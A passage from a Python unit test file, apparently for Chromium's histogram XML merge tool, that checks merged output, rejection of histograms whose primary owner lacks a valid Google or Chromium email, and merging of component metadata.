expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
<token key="TestToken" variants="TestToken"/>
</histogram>
</histograms>
<histogram_suffixes_list>
<histogram_suffixes name="Test.EnumHistogramSuffixes" separator="."
ordering="prefix,2">
<suffix name="TestEnumSuffix" label="The enum histogram_suffixes"/>
<affected-histogram name="Test.EnumHistogram"/>
</histogram_suffixes>
<histogram_suffixes name="Test.HistogramSuffixes" separator=".">
<suffix name="TestSuffix" label="A histogram_suffixes"/>
<affected-histogram name="Test.Histogram"/>
</histogram_suffixes>
</histogram_suffixes_list>
</histogram-configuration>
"""
    self.maxDiff = None
    self.assertMultiLineEqual(expected_merged_xml.strip(), merged.strip())

  def testMergeFiles_InvalidPrimaryOwner(self):
    """Checks that merging fails when a histogram's first owner is invalid."""
    histograms_without_valid_first_owner = xml.dom.minidom.parseString("""
<histogram-configuration>
<histograms>
<histogram name="Caffeination" units="mg">
<owner>culprit@evil.com</owner>
<summary>I like coffee.</summary>
</histogram>
</histograms>
</histogram-configuration>
""")
    with self.assertRaisesRegex(
        expand_owners.Error,
        'The histogram Caffeination must have a valid primary owner, i.e. a '
        'Googler with an @google.com or @chromium.org email address. Please '
        'manually update the histogram with a valid primary owner.'):
      merge_xml.MergeTrees([histograms_without_valid_first_owner],
                           should_expand_owners=True)

  def testMergeFiles_WithComponentMetadata(self):
    """Checks that per-directory component metadata is merged into owners."""
    merged = merge_xml.PrettyPrintMergedFiles(
        [histogram_paths.TEST_XML_WITH_COMPONENTS_RELATIVE])
    expected_merged_xml = """
<histogram-configuration>
<histograms>
<histogram name="Test.Histogram" units="seconds" expires_after="M104">
<owner>person@chromium.org</owner>
<owner>team-alias@chromium.org</owner>
<component>Test>Component</component>
<summary>Summary 2</summary>
</histogram>
<histogram name="Test.Histogram.WithComponent" enum="TestEnum"
expires_after="M104">
<owner>uma@chromium.org</owner>
<owner>team-alias@chromium.org</owner>
<component>First>Component</component>
<component>Test>Component</component>
<summary>A enum histogram.</summary>
</histogram>
</histograms>
<histogram_suffixes_list/>
</histogram-configuration>
"""
    self.assertMultiLineEqual(expected_merged_xml.strip(), merged.strip())
if __name__ == '__main__':
  # Run the merge_xml tests directly.
  unittest.main()
| [
"jengelh@inai.de"
] | jengelh@inai.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.